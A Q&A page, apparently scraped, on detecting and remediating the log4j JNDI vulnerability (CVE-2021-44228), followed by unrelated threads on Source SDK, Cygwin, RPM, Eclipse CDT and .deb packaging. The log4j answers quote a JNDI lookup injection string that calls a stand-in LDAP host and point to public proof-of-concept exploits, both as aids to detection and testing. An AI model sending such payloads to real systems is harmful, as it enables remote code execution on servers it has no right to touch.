Recently there was a log4j vulnerability reported:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.randori.com/blog/cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day/
How do I know exactly my system has been attacked or exploited by injected arbitrary code?
Thank you so much
UPDATE: 2021-12-18...
Remember to always check for the latest information from the resources listed below
CVE-2021-45105... 2.16.0 and 2.12.2 are no longer valid remediations! The current fixing versions are 2.17.0 (Java 8) and 2.12.3 (Java 7). All other Java versions have to take the stop gap approach (removing/deleting JndiLookup.class file from the log4j-core JAR.
I have updated my message below accordingly.
Answering the question directly:
Reddit thread: log4j_0day_being_exploited has SEVERAL resources that can help you.
To detect vulnerability
cntl + f for Vendor Advisories. Check those lists to see if you are running any of that software. If you are and an update is available for it, update.
THEN cntl + f for .class and .jar recursive hunter. Run the program there, if it finds anything remediate.
You can also cntl + f for Vulnerability Detection if you want to perform a manual active test of your systems for the vulnerability
To detect exploit... this is more complex and all I do is is till you
cntl + f for Vendor Advisories... search through the stuff there... not sure which option will be best for you
More resources
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
This one has TONS of useful info including detectors, even more resource links, very easy to understand remediation steps, and more
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://logging.apache.org/log4j/2.x/security.html
Remediation:
CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105
While most people that need to know probably already know enough to do what they need to do, I thought I would still put this just in case...
Follow the guidance in those resources... it may change, but
As of 2021-12-18
It's basically
Remove log4j-core JAR files if possible
From both running machines for immediate fix AND
in your source code / source code management files to prevent future builds / releases / deployments from overwriting the change
If that is not possible (due to a dependency), upgrade them
If you are running Java8, then you can upgrade to log4j 2.17.0+
If you are running an earlier version of Java, then you can upgrade to log4j 2.12.3
If you are running an older version of Java, then you need to upgrade to the newest version of Java, and then use the newest version of Log4J
Again, these changes have to happen both on running machine and in code
If neither of those are possible for some reason... then there is the NON-remediation stop gap of removing the JndiLookup.class file from the log4j-core JARs.
There is a one-liner for the stop gap option on Linux using the zip command that comes packaged with most Linux distros by default.
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
At time of writing, most of the guides online for the stop gap option on Windows say to do the following (again... assuming you can't do one of the remove JAR or upgrade options above):
Install something like 7-zip
Locate all of your log4j-core JAR files and for each one do the following...
Rename the JAR to change the extension to .zip
Use 7-zip to unzip the JAR (which now has a .zip extension)
Locate and remove the JndiLookup.class file from the unzipped folder
The path is \\path\\to\\unzippedFolder\\org\\apache\\logging\\log4j\\core\\lookup\\JndiLookup.class
Delete the old JAR file (which now has an extension of .zip)
Use 7-zip to RE-zip the folder
Rename the new .zip folder to change the extension to .jar
There are also some options to use Power Shell
Reddit thread: log4j_0day_being_exploited
ctrl+f for "PowerShell"
This is fine if you only have 1 or 2 JAR files to deal with and you don't mind installing 7-zip or you have PowerShell available to do it. However, if you have lots of JAR files, or if you don't want to install 7-zip and don't have access to Power Shell, I created an open-source VBS script that will do it for you without needing to install any additional software. https://github.com/CrazyKidJack/Windowslog4jClassRemover
Read the README and the Release Notes https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
You can check on your request log if you see something looking like this :
{jndi:ldap://example.com:1234/callback}
If you want to check if you can be attacked, you can run a POC from Github. This link seems to be the first POC released. You can now find others.
You can also find a black-box testing here.
Related
I just try to set up Valves Source SDK 2013 for Linux but I need to say that I find the wiki + documentation rather confusing and partly heavily outdated (Windows-only instructions, only for GoldSrc / pre-20XX SDk etc.).
I hope that someone who already has gone through the hassle can supply me with some hints on how to correctly set up the system.
I tried to use some Windows-specific instructions to understand the system but some are highly platform-specific.
So here is the current status (I based what I did on this wiki page: Wiki: Source SDK 2013:
The source of the SDK SDK 2013 from GitHub is cloned to
~/Git/source-sdk-2013/
the SDK Base 2013 installed via Steam and the steam-runtime to
~/working/steam-runtime-sdk_2013-09-05/
I was not sure whether there is a specific path I should put the steam runtime into so I just put it into my self-created working dir.
# Create a Multiplayer sample project
export SDKROOT="~/Git/source-sdk-2013"
bash $SDKROOT/mp/src/creategameprojects
bash $SDKROOT/mp/src/createallprojects
# Setup Steam Runtime
export STEAMRT="~/working/steam-runtime-sdk_2013-09-05/"
cd $STEAMRT
# Choose all build targets (i386 + amd64) and download these
./setup.sh
# Set current to target to the same as host machine (ie. amd64)
./shell.sh
# Compile the actual game
make -f $SDKROOT/mp/src/games.mak
I have not yet touched any source files as there's plenty of sources already supplied. I just wanted to confirm having a working toolchain set up
This all compiles fine but in the end the script wants to chmod the client.so and server.so but claims "not found" – but it sadly does not provide any information where it searched for them. Actually these are existant in
$SDKROOT/mp/game/mod_hl2mp/bin
and even marked as executable (-rwxr-xr-x).
So I just ignored this and hoped for the best. The next line to me sounds a bit strange:
At this point you should have client.so and server.so files to load with the Source SDK Base 2013 of your choice.
So I should be able so load the files with "the Source SDK Base 2013" (of your choice?!? Valve is the only one providing it O.o). How am I supposed to do that? I have not found any hint whatsoever for that, sadly.
But they hint me to the README.txt of the steam-runtime which tells me to do this:
run.sh ./MyGame
But where's the executable? I only have .so's
And this is the point where I currently am. I'm quite confused as I have many questions now:
Why do only the Linux users need to download the steam runtime? What if I want to not ship via Steam?
Is that chmod failure a script failure or a mistake in my directory setup?
How do I load these libraries via the SDK Base
Where is the binary? I'm quite confused here...
Have I overlooked something?
I appreciate any hints or links to resources, maybe explanations when I just were to dumb to understand what they mean :P
EDIT: Actually there is a GitHub repo for the steam-runtime too (GitHub/steam-runtime) – why is the download so outdated, the git repo has some updated stuff going on. Which should one choose?
With the help of a friend I didn't expect to be able to answer this (he didn't know about Linux but we could figure it out) I could solve it faster than expected.
To "load" the game via the Steam SDK Base just append the -game parameter and point it to the directory with the gameinfo.txt (ie. $SDKROOT/mp/game/mod_hl2mp/) in it.
Alternatively just copy the contents of this directory to
~/.local/share/Steam/steamapps/sourcemods/$MYSOURCEMOD
where $MYSOURCEMOD is how you want to call it (do not use spaces). Then add a steam.inf file in that dir with following content:
appID=243750
ProductName=$MYSOURCEMOD
PatchVersion=1.0.0.0
After a restart Steam will be able to find the sourcemod.
I'm not quite sure what the "steam-runtime" thingy is but I suppose it is to set up the build environment (to use a custom gcc etc.) as this is how the scripts look like. I'm not sure why you should run the game via the run.sh in the bin/ subfolder of the runtime instead of via Steam or via the parameter one the Source SDK Base but maybe someone can enlighten me here.
The archive one shall download is only a downloader/configurator for the steam-runtime hosted on GitHub.
I have a standalone server running Cygwin -- I did not setup this server, it was inherited. Anyway, I'd like to know what options the installing admin selected in the setup program.
I've read that I could look in /etc/setup, /etc/postinstall, or /etc/preremove but there are a lot of packages in those directories... same goes for the output of cygcheck -c.
I don't want to know every single library on the system... just how to duplicate the install. Is there a way to determine which packages were select in the GUI setup program?
Thanks!
Cygwin is pretty standalone. You should be able to archive up the entire Cygwin directory (and subdirectories) and move it to the same location on another system.
If you archive it up I recommend 7-zip. You can get it free here. The built in Windows archiver can create permission problems when an archive is extracted on a destination system. I recommend 7-zip for both archiving and unarchiving. If you use the built in Windows archiver and then move it to the new system and extract it - it will extract without errors. However you may find things don't actually work right while using some Cygwin applications
If you don't copy everything you won't move any of the original admin's custom changes.
I have several applications that I wish to deploy using rpm. Some of the files in my application deployments override files from other deployed packages. Simply including the new files in the deployment package will cause rpm conflicts.
I am looking for the proper way to use rpm to update/replace already installed files.
I have already come up with a few solutions but nothing seems quite right.
Maintain custom versions of the rpms containing the original files.
This seems like a large amount of work for a relatively small reward even though it feels less like a hack than some of the other possible solutions.
Include the files in the rpm with another name and copy them over in the post section.
This would work but will mean littering the system with multiple copies of the files. Also it means additional maintenance in the rpm build spec for each file.
Use wget in the post section to replace the original files from some known server.
This is similar to the copy technique but the files wouldn't even live in the rpm. This might act like a nice central configuration authority though.
Deploy the files as new files, then use symlinks to override the originals.
This is also similar to the copy technique but with less clutter. The problem here is that some files don't behave well as symlinks.
To the best of my knowledge, RPM is not designed to permit updating / replacing existing files, so anything that you do is going to be a hack.
Of the options you list, I'd choose #1 as the least bad hack if the target systems are systems that I admin (as you say, it's more work but is the cleanest solution) and a combination of #2 and #4 (symlinks where possible, copies where not) if I'm creating the RPMs for others' systems (to avoid having to distribute a bunch of RPMs, but I'd make it very clear in the docs what I'm doing).
You haven't described which files need to be updated or replaced and how they need to be updated. Depending on the answers to those questions, you may have a couple of other options:
Many programs are designed to use a single default configuration file and also to grab configuration files from a .d subdirectory. For example, Apache uses /etc/httpd/conf/httpd.conf and /etc/httpd/conf.d/*.conf, so your RPMs could drop files under /etc/httpd/conf.d instead of modifying /etc/httpd/conf/httpd.conf. And if the files that you need to modify are config files that don't follow this pattern but could be made to, you can suggest to the package maintainers that they add this capability; this wouldn't help you immediately but would make future releases easier.
For command-line utilities like sendmail and lpr that can be provided by multiple packages, the alternatives system (see man alternatives) permits more than 1 RPM that provides these utilities to be installed side by side. Again, if the files that you need to modify are command-line utilities that don't follow this pattern but could be made to, you can suggest to the package maintainers that they add this capability.
Config file changes on systems that you administer are better managed through a tool like Cfengine or Puppet rather than through custom RPMs. I think that Red Hat favors Puppet.
If I were creating the RPMs for systems I don't administer, I'd consider using a third-party tool like Bitrock and dumping all of my stuff under /opt just so I wouldn't have to stomp on files installed by other admins' RPMs.
Edit (2019): Nowadays, Software Collections offers a useful alternative. You can create packages that install somewhere under /opt, and the Software Collections tools offer a standardized way for users to opt in to using those instead of whatever's normally installed under /usr. Red Hat uses this to distribute newer versions of tools for their otherwise stable and long-lived (i.e., older) Red Hat Enterprise Linux distributions.
You can also execute rpm -U --replacefiles --replacepkgs ..., which will give you what you want.
See here for more info on RPM %files directives:
http://www.rpm.org/max-rpm/s1-rpm-inside-files-list-directives.html
You can use the arguments from the %post and %pre sections in the RPM scriptlets to determine if you are installing, upgrading or removing packages.
If $1 is 0 - then we're removing old stuff. Targeting 0 packages installed.
If $1 is 1 - then we're installing new stuff. Targeting a total of 1 package to be installed.
If $1 is 2 or more - then we're upgrading this package and $1 represents the number of packages already installed.
These sections help with managing files among the versions.
Keep track of what you're doing between versions and consider what one might do if they were to skip a version or two.
Have consideration for these things and you should be good to go!
What files can be safely removed from CDT project and workspace before archiving or saving in a source control system?
Having MSVC experience, I tried to remove Debug and Release directories, this was really bad idea :(
Are you using an Eclipse plug-in for your version control system of choice? They seem to take care of everything (at least in my experience with the CVS and Mercurial plugins). If not, you'll need to tell Eclipse to refresh pretty much your whole project whenever you've interacted with version control.
The contents of the Debug and Release directories should all be autogenerated. If they're not, something's wrong.
Rather than what you can delete, turn it around and consider what you need to keep:
.project, .cproject and (if it exists) .settings
Your source directories
Your include directories
Any other human-created files at the top level e.g. Changelog, documentation
It may also be worthwhile looking inside the .metadata directory in your workspace root; for example, any launch configurations you have created are stored by default in .metadata/.plugins/org.eclipse.debug.core/.launches/ . (Although I have seen them inside project directories from time to time.)
I'm trying to update our installer so a user can simply double-click on a file and have all the dependencies and our software installed easily. This is a suite of applications that will are deployed on a clean Ubuntu 8.04 (Hardy Heron) installation. I have investigated making a .deb file, but listing the dependencies doesn't work, because there isn't any Internet access available. And, any script that would set up a local APT repository would still need to be run from the command line. Is there a way to put a .deb file inside of a .deb file?
I know many companies ship shell scripts that you have to chmod +x, and then execute. This is not acceptable. It is ridiculous that this isn't possible; especially considering the distribution and architecture is fixed.
If you are totally confident that it will be installed on the same system every time, you can find the list of package dependencies yourself, fetch them from the Ubuntu repositories, and package them up with your software. You just have to be clear that your software is for a specific version, probably deal with things like keeping up with maintenance releases.
You can also easily install with a script. As for your complaint about making scripts executable, well, I don't know how you're shipping your product, but since you say it's going somewhere without Internet access, I assume it's going to be copied from some kind of media. If you make the script executable when you put it on that media, you're done.
If you'd like to do this using packages, you can create a CD-ROM which contains a package repository. You can find all kinds of information on this with Google Search. For starters, try this - it's a GUI for doing it. http://aptoncd.sourceforge.net/
A makeself self-extracting executable that starts the install script using sudo will work.
The user can either run it from a terminal (after chmod-ing it) or can double-click it and tell it to "Run" from the prompt.
It's possible to put deb-files into deb-files. The only thing you need to do is to configure the appropriate scripts.
A .deb-file consists of:
1x control.tar.gz: contains a file "control" (describes the package) and optional files like "postinst" (script executed right after extraction). There are other files you might include, and Google Search should deliver information about the available scripts.
1x data.tar.gz: contains some structure of root-filesystem which contains files/folders that need to be (re-)placed. Additionally, you may configure the behaviour in the mentioned scripts.
1x debian-binary: as far as I remember, this is simply a version number in a file. I don't know exactly what it means; just remember that in most of the cases this is 2.0.
So you now may put your .deb files in the data-package. Those are extracted by your script... and installed using:
# dpkg -i yourpackage1.deb yourpackage2.deb